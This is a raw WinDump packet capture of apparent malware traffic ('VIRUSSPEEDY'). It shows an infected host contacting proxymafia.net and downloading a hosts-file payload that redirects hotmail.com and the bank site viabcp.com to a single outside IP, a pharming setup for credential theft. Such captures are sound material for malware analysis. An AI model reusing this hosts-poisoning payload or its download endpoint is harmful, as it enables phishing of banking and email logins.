C:\Seguridad>WinDump -n -X -r VIRUSSPEEDY reading from file VIRUSSPEEDY, link-type EN10MB (Ethernet) 12:02:43.065917 IP 192.168.131.65.1036 > 200.48.225.130.53: 53973+ A? www.proxymafia.net. (36) 0x0000: 4500 0040 0be0 0000 8011 4130 c0a8 8341 E..@......A0...A 0x0010: c830 e182 040c 0035 002c b263 d2d5 0100 .0.....5.,.c.... 0x0020: 0001 0000 0000 0000 0377 7777 0a70 726f .........www.pro 0x0030: 7879 6d61 6669 6103 6e65 7400 0001 0001 xymafia.net..... 12:02:43.185270 IP 200.48.225.130.53 > 192.168.131.65.1036: 53973 2/2/2 CNAME proxymafia.net., A 67.159.45.52 (143) 0x0000: 4500 00ab 0001 4000 8011 0ca4 c830 e182 E.....@......0.. 0x0010: c0a8 8341 0035 040c 0097 7b79 d2d5 8180 ...A.5....{y.... 0x0020: 0001 0002 0002 0002 0377 7777 0a70 726f .........www.pro 0x0030: 7879 6d61 6669 6103 6e65 7400 0001 0001 xymafia.net..... 0x0040: c00c 0005 0001 0000 0096 0002 c010 c010 ................ 0x0050: 0001 0001 0000 0096 0004 439f 2d34 c010 ..........C.-4.. 0x0060: 0002 0001 0000 4cc1 000f 036e 7332 0561 ......L....ns2.a 0x0070: 6e6f 6e72 0363 6f6d 00c0 1000 0200 0100 nonr.com........ 0x0080: 004c c100 0603 6e73 31c0 52c0 6900 0100 .L....ns1.R.i... 0x0090: 0100 0104 5900 044b 7e30 93c0 4e00 0100 ....Y..K~0..N... 0x00a0: 0100 0104 5900 0443 9f2d 34 ....Y..C.-4 12:02:43.229134 IP 192.168.131.65.1233 > 67.159.45.52.80: S 1020152609:1020152609(0) win 65535 192.168.131.65.1233: S 4096:4096(0) ack 1020152610 win 4096 0x0000: 4500 002c 0002 4000 8006 460d 439f 2d34 E..,..@...F.C.-4 0x0010: c0a8 8341 0050 04d1 0000 1000 3cce 4b22 ...A.P......<.K" 0x0020: 6012 1000 39e4 ffff 0204 0218 0000 `...9......... 12:02:43.301859 IP 192.168.131.65.1233 > 67.159.45.52.80: . ack 1 win 65535 0x0000: 4500 0028 0be3 4000 8006 3a30 c0a8 8341 E..(..@...:0...A 0x0010: 439f 2d34 04d1 0050 3cce 4b22 0000 1001 C.-4...P<.K".... 0x0020: 5010 ffff 5e05 0000 P...^... 12:02:43.306477 IP 192.168.131.65.1233 > 67.159.45.52.80: P 1:373(372) ack 1 win 65535 0x0000: 4500 019c 0be4 4000 8006 38bb c0a8 8341 E.....@...8....A 0x0010: 439f 2d34 04d1 0050 3cce 4b22 0000 1001 C.-4...P<.K".... 0x0020: 5018 ffff 813c 0000 4745 5420 2f73 7572 P....<..GET./sur 0x0030: 662e 7068 703f 713d 6148 5230 6344 6f76 f.php?q=aHR0cDov 0x0040: 4c32 4a79 6157 4675 6332 5668 5a33 4a68 L2JyaWFuc2VhZ3Jh 0x0050: 646d 567a 4c6d 4e76 6253 3977 636d 396d dmVzLmNvbS9wcm9m 0x0060: 6157 786c 6379 396f 6233 4e30 4c6e 5234 aWxlcy9ob3N0LnR4 0x0070: 6441 2533 4425 3344 2668 6c3d 3365 6420 dA%3D%3D&hl=3ed. 0x0080: 4854 5450 2f31 2e31 0d0a 4163 6365 7074 HTTP/1.1..Accept 0x0090: 3a20 2a2f 2a0d 0a41 6363 6570 742d 456e :.*/*..Accept-En 0x00a0: 636f 6469 6e67 3a20 677a 6970 2c20 6465 coding:.gzip,.de 0x00b0: 666c 6174 650d 0a49 662d 4d6f 6469 6669 flate..If-Modifi 0x00c0: 6564 2d53 696e 6365 3a20 5375 6e2c 2032 ed-Since:.Sun,.2 0x00d0: 3320 4465 6320 3230 3037 2031 333a 3239 3.Dec.2007.13:29 0x00e0: 3a34 3520 474d 540d 0a49 662d 4e6f 6e65 :45.GMT..If-None 0x00f0: 2d4d 6174 6368 3a20 2231 3630 6630 3534 -Match:."160f054 0x0100: 622d 3730 2d34 3736 6536 3263 3922 0d0a b-70-476e62c9".. 0x0110: 5573 6572 2d41 6765 6e74 3a20 4d6f 7a69 User-Agent:.Mozi 0x0120: 6c6c 612f 342e 3020 2863 6f6d 7061 7469 lla/4.0.(compati 0x0130: 626c 653b 204d 5349 4520 362e 303b 2057 ble;.MSIE.6.0;.W 0x0140: 696e 646f 7773 204e 5420 352e 313b 2053 indows.NT.5.1;.S 0x0150: 5631 290d 0a48 6f73 743a 2077 7777 2e70 V1)..Host:.www.p 0x0160: 726f 7879 6d61 6669 612e 6e65 740d 0a43 roxymafia.net..C 0x0170: 6f6e 6e65 6374 696f 6e3a 204b 6565 702d onnection:.Keep- 0x0180: 416c 6976 650d 0a43 6f6f 6b69 653a 2066 Alive..Cookie:.f 0x0190: 6c61 6773 3d33 6564 0d0a 0d0a lags=3ed.... 12:02:43.307228 IP 67.159.45.52.80 > 192.168.131.65.1233: . ack 373 win 3724 0x0000: 4500 0028 0005 4000 8006 460e 439f 2d34 E..(..@...F.C.-4 0x0010: c0a8 8341 0050 04d1 0000 1001 3cce 4c96 ...A.P......<.L. 0x0020: 5010 0e8c 4e05 ffff 0000 0000 0000 P...N......... 12:02:43.533981 IP 67.159.45.52.80 > 192.168.131.65.1233: P 1:674(673) ack 373 win 4096 0x0000: 4500 02c9 0008 4000 8006 436a 439f 2d34 E.....@...CjC.-4 0x0010: c0a8 8341 0050 04d1 0000 1001 3cce 4c96 ...A.P......<.L. 0x0020: 5018 1000 a49e ffff 4854 5450 2f31 2e31 P.......HTTP/1.1 0x0030: 2032 3030 204f 4b0d 0a44 6174 653a 2054 .200.OK..Date:.T 0x0040: 6875 2c20 3331 204a 616e 2032 3030 3820 hu,.31.Jan.2008. 0x0050: 3231 3a33 353a 3238 2047 4d54 0d0a 5365 21:35:28.GMT..Se 0x0060: 7276 6572 3a20 4170 6163 6865 2f31 2e33 rver:.Apache/1.3 0x0070: 2e33 3720 2855 6e69 7829 206d 6f64 5f61 .37.(Unix).mod_a 0x0080: 7574 685f 7061 7373 7468 726f 7567 682f uth_passthrough/ 0x0090: 312e 3820 6d6f 645f 6c6f 675f 6279 7465 1.8.mod_log_byte 0x00a0: 732f 312e 3220 6d6f 645f 6277 6c69 6d69 s/1.2.mod_bwlimi 0x00b0: 7465 642f 312e 3420 5048 502f 342e 342e ted/1.4.PHP/4.4. 0x00c0: 3720 6d6f 645f 7373 6c2f 322e 382e 3238 7.mod_ssl/2.8.28 0x00d0: 204f 7065 6e53 534c 2f30 2e39 2e38 610d .OpenSSL/0.9.8a. 0x00e0: 0a58 2d50 6f77 6572 6564 2d42 793a 2050 .X-Powered-By:.P 0x00f0: 4850 2f34 2e34 2e37 0d0a 4c61 7374 2d4d HP/4.4.7..Last-M 0x0100: 6f64 6966 6965 643a 2053 756e 2c20 3233 odified:.Sun,.23 0x0110: 2044 6563 2032 3030 3720 3133 3a32 393a .Dec.2007.13:29: 0x0120: 3435 2047 4d54 0d0a 4554 6167 3a20 2231 45.GMT..ETag:."1 0x0130: 3630 6630 3534 622d 3730 2d34 3736 6536 60f054b-70-476e6 0x0140: 3263 3922 0d0a 4163 6365 7074 2d52 616e 2c9"..Accept-Ran 0x0150: 6765 733a 2062 7974 6573 0d0a 5365 742d ges:.bytes..Set- 0x0160: 436f 6f6b 6965 3a20 666c 6167 733d 3365 Cookie:.flags=3e 0x0170: 643b 2065 7870 6972 6573 3d54 6875 2c20 d;.expires=Thu,. 0x0180: 3238 2d46 6562 2d32 3030 3820 3231 3a33 28-Feb-2008.21:3 0x0190: 353a 3239 2047 4d54 3b20 7061 7468 3d2f 5:29.GMT;.path=/ 0x01a0: 3b20 646f 6d61 696e 3d2e 7777 772e 7072 ;.domain=.www.pr 0x01b0: 6f78 796d 6166 6961 2e6e 6574 0d0a 436f oxymafia.net..Co 0x01c0: 6e74 656e 742d 4469 7370 6f73 6974 696f ntent-Dispositio 0x01d0: 6e3a 2069 6e6c 696e 653b 2066 696c 656e n:.inline;.filen 0x01e0: 616d 653d 2268 6f73 742e 7478 7422 0d0a ame="host.txt".. 0x01f0: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:. 0x0200: 3131 320d 0a4b 6565 702d 416c 6976 653a 112..Keep-Alive: 0x0210: 2074 696d 656f 7574 3d31 2c20 6d61 783d .timeout=1,.max= 0x0220: 3130 300d 0a43 6f6e 6e65 6374 696f 6e3a 100..Connection: 0x0230: 204b 6565 702d 416c 6976 650d 0a43 6f6e .Keep-Alive..Con 0x0240: 7465 6e74 2d54 7970 653a 2074 6578 742f tent-Type:.text/ 0x0250: 706c 6169 6e0d 0a0d 0a36 362e 3439 2e31 plain....66.49.1 0x0260: 3933 2e32 3238 2077 7777 2e68 6f74 6d61 93.228.www.hotma 0x0270: 696c 2e63 6f6d 0d0a 3636 2e34 392e 3139 il.com..66.49.19 0x0280: 332e 3232 3820 686f 746d 6169 6c2e 636f 3.228.hotmail.co 0x0290: 6d0d 0a36 362e 3439 2e31 3933 2e32 3238 m..66.49.193.228 0x02a0: 2077 7777 2e76 6961 6263 702e 636f 6d0d .www.viabcp.com. 0x02b0: 0a36 362e 3439 2e31 3933 2e32 3238 2076 .66.49.193.228.v 0x02c0: 6961 6263 702e 636f 6d iabcp.com 12:02:43.684859 IP 192.168.131.65.1233 > 67.159.45.52.80: . ack 674 win 65535 0x0000: 4500 0028 0be6 4000 8006 3a2d c0a8 8341 E..(..@...:-...A 0x0010: 439f 2d34 04d1 0050 3cce 4c96 0000 12a2 C.-4...P<.L..... 0x0020: 5010 ffff 59f0 0000 P...Y... 12:02:45.706311 IP 67.159.45.52.80 > 192.168.131.65.1233: F 674:674(0) ack 373 win 4096 0x0000: 4500 0028 001a 4000 8006 45f9 439f 2d34 E..(..@...E.C.-4 0x0010: c0a8 8341 0050 04d1 0000 12a2 3cce 4c96 ...A.P......<.L. 0x0020: 5011 1000 49ef ffff 0000 0000 0000 P...I......... 12:02:45.712537 IP 192.168.131.65.1233 > 67.159.45.52.80: . ack 675 win 65535 0x0000: 4500 0028 0be7 4000 8006 3a2c c0a8 8341 E..(..@...:,...A 0x0010: 439f 2d34 04d1 0050 3cce 4c96 0000 12a3 C.-4...P<.L..... 0x0020: 5010 ffff 59ef 0000 P...Y... 12:02:47.113734 IP 192.168.131.65.1233 > 67.159.45.52.80: R 373:373(0) ack 675 win 0 0x0000: 4500 0028 0be8 4000 8006 3a2b c0a8 8341 E..(..@...:+...A 0x0010: 439f 2d34 04d1 0050 3cce 4c96 0000 12a3 C.-4...P<.L..... 0x0020: 5014 0000 59eb 0000 P...Y...